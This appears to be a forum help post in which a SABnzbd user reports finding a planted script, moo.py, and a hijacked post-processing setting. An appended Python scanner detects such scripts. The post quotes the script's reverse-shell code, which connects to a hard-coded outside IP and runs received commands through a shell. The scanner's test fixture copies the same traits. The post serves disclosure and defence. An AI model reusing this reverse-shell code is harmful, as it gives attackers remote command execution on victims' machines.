After looking at my successfully downloaded files I noticed the following directories: fu and fu.1 in the downloads area.
Both contained a script called moo.py.
In the sabnzbd settings this directory was set as the user post-processing directory (not by me).
Both files are owned by the user sabnzbd (limited rights).
Running sabnzbd on a Linux server, version 0.7.20.
The contents of the file are:
```python
HOST = '18.104.22.168' # The remote host
PORT = 4430 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
# send we are connected
s.send('[*] Connection Established!')
# start loop
# receive shell command
data = s.recv(1024)
# if it's quit, then break out and close socket
if data == "quit": break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
# close socket
```
It does not seem totally harmless to me, nor should it be something installed as part of sabnzbd.
How do I stop this happening in the future, especially the part where my sabnzbd configuration was changed to set the "fu" directory as the post-processing user script directory by something/someone?
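A defender-side check to go with this report, added here as an example and not part of the original post or of SABnzbd itself: it scans a post-processing script directory for the traits of the quoted moo.py (hard-coded host/port, a raw socket, recv(), and received data handed to a shell) and pulls script_dir out of sabnzbd.ini so you can compare it with the directory you actually chose. The ini key name, the fixture paths and the fixture files are all assumptions constructed for the demo.

```python
import os
import re
import tempfile

# Traits of the script quoted in the post; a benign post-processing script
# should trip none or one of these, the dropped shell trips all of them.
INDICATORS = {
    "hardcoded_host_port": re.compile(r"^\s*(HOST|PORT)\s*=", re.M),
    "raw_socket": re.compile(r"socket\.socket\("),
    "socket_recv": re.compile(r"\.recv\("),
    "shell_exec": re.compile(r"subprocess\.Popen\(.*shell\s*=\s*True"),
}

def scan_script(path):
    """Return the names of the indicators present in one script file."""
    with open(path, "r", errors="replace") as fh:
        text = fh.read()
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_script_dir(script_dir, min_hits=3):
    """Scan every regular file in the post-processing script directory.
    Returns {filename: [indicators]} for files tripping at least min_hits."""
    findings = {}
    for name in sorted(os.listdir(script_dir)):
        path = os.path.join(script_dir, name)
        if os.path.isfile(path):
            hits = scan_script(path)
            if len(hits) >= min_hits:
                findings[name] = hits
    return findings

def script_dir_from_ini(ini_text):
    """Read script_dir from sabnzbd.ini text (key name assumed; quotes stripped)."""
    m = re.search(r'^script_dir\s*=\s*"?([^"\r\n]*)"?\s*$', ini_text, re.M)
    return m.group(1) if m else None

def demo():
    """Build a constructed fixture (not the poster's real files) and scan it."""
    tmp = tempfile.mkdtemp()
    benign = "import sys\nprint('post-processing', sys.argv[1])\n"
    # Skeleton with the same traits as the quoted moo.py; placeholder address.
    suspect = ("HOST = '192.0.2.1'\nPORT = 4430\n"
               "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
               "data = s.recv(1024)\n"
               "proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE)\n")
    for name, body in (("notify.py", benign), ("moo.py", suspect)):
        with open(os.path.join(tmp, name), "w") as fh:
            fh.write(body)
    ini = '[misc]\nscript_dir = "/home/sabnzbd/downloads/fu"\n'  # constructed
    return scan_script_dir(tmp), script_dir_from_ini(ini)
```

Run it against the real script directory and sabnzbd.ini; a script_dir pointing into the downloads area, or any file with three or more hits, is worth pulling for a closer look.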